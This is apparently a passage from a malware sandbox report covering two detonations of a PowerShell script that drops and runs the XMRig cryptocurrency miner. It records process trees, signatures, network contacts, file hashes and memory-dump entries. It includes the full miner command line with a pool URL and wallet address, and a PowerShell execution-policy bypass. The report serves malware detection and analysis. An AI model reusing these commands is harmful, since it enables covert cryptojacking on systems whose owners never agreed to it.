SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1744-25-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/1744-29-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/1744-30-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/1744-31-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/1744-51-0x0000016221660000-0x0000016221672000-memory.dmp

memory/1744-64-0x00000162212B0000-0x00000162212BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2708-93-0x0000021250890000-0x00000212508B0000-memory.dmp

memory/2708-94-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-95-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-96-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-97-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-98-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-99-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-100-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-101-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-102-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-103-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-104-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-105-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-106-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-107-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-108-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-109-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-110-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-111-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-112-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-113-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-114-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-115-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-116-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-117-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-118-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-119-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-120-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-121-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-122-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-123-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-124-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-125-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-126-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-127-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-128-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-129-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-130-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-131-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-132-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-133-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-134-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-135-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-136-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-137-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-138-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-139-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-140-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-141-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-142-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-143-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-144-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-145-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-146-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-147-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-148-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-149-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-150-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-151-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-152-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-153-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-154-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-155-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

memory/2708-156-0x00007FF7DF120000-0x00007FF7DFD53000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:44

Platform

win10v2004-20240508-en

Max time kernel

1796s

Max time network

1807s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp

Files

memory/3244-0-0x00007FFEFB383000-0x00007FFEFB385000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ldz3lbk3.5gg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3244-10-0x000001ED739E0000-0x000001ED73A02000-memory.dmp

memory/3244-11-0x00007FFEFB380000-0x00007FFEFBE41000-memory.dmp

memory/3244-12-0x00007FFEFB380000-0x00007FFEFBE41000-memory.dmp

memory/3244-14-0x00007FFEFB380000-0x00007FFEFBE41000-memory.dmp

memory/3244-15-0x000001ED73DB0000-0x000001ED73DC2000-memory.dmp

memory/3244-16-0x000001ED739C0000-0x000001ED739CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3632-47-0x000002CFF9BC0000-0x000002CFF9BE0000-memory.dmp

memory/3632-48-0x000002D08DB20000-0x000002D08DB40000-memory.dmp

memory/3244-49-0x00007FFEFB383000-0x00007FFEFB385000-memory.dmp

memory/3244-51-0x00007FFEFB380000-0x00007FFEFBE41000-memory.dmp

memory/3632-50-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-52-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-53-0x000002D08DF60000-0x000002D08DF80000-memory.dmp

memory/3632-54-0x000002D08E190000-0x000002D08E1B0000-memory.dmp

memory/3632-55-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3244-56-0x00007FFEFB380000-0x00007FFEFBE41000-memory.dmp

memory/3632-57-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-59-0x000002D08DF60000-0x000002D08DF80000-memory.dmp

memory/3632-58-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-60-0x000002D08E190000-0x000002D08E1B0000-memory.dmp

memory/3632-61-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-62-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-63-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-64-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-65-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-66-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-67-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-68-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-69-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-70-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-71-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-72-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-73-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-74-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-75-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-76-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-77-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-78-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-79-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-80-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-81-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-82-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-83-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-84-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-85-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-86-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-87-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-88-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-89-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-90-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-91-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-92-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-93-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-94-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-95-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-96-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-97-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-98-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-99-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-100-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-101-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-102-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-103-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-104-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-105-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-106-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-107-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-108-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-109-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-110-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-111-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-112-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-113-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-114-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-115-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-116-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-117-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

memory/3632-118-0x00007FF6B7C10000-0x00007FF6B8843000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:06

Platform

win11-20240508-en

Max time kernel

1797s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/2224-0-0x00007FFB96663000-0x00007FFB96665000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gnru41kf.qh1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2224-9-0x000002426C730000-0x000002426C752000-memory.dmp

memory/2224-10-0x00007FFB96660000-0x00007FFB97122000-memory.dmp

memory/2224-11-0x00007FFB96660000-0x00007FFB97122000-memory.dmp

memory/2224-12-0x00007FFB96660000-0x00007FFB97122000-memory.dmp

memory/2224-14-0x000002426CF90000-0x000002426CFA2000-memory.dmp

memory/2224-15-0x000002426C8D0000-0x000002426C8DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4808-46-0x0000028435490000-0x00000284354B0000-memory.dmp

memory/4808-47-0x00000284354D0000-0x00000284354F0000-memory.dmp

memory/4808-48-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/2224-50-0x00007FFB96660000-0x00007FFB97122000-memory.dmp

memory/4808-49-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/2224-51-0x00007FFB96663000-0x00007FFB96665000-memory.dmp

memory/4808-53-0x0000028435510000-0x0000028435530000-memory.dmp

memory/4808-52-0x00000284354F0000-0x0000028435510000-memory.dmp

memory/2224-54-0x00007FFB96660000-0x00007FFB97122000-memory.dmp

memory/4808-55-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-56-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-57-0x00000284354F0000-0x0000028435510000-memory.dmp

memory/4808-58-0x0000028435510000-0x0000028435530000-memory.dmp

memory/4808-59-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-60-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-61-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-62-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-63-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-64-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-65-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-66-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-67-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-68-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-69-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-70-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-71-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-72-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-73-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-74-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-75-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-76-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-77-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-78-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-79-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-80-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-81-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-82-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-83-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-84-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-85-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-86-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-87-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-88-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-89-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-90-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-91-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-92-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-93-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-94-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-95-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-96-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-97-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-98-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-99-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-100-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-101-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-102-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-103-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-104-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-105-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-106-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-107-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-108-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-109-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-110-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-111-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-112-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

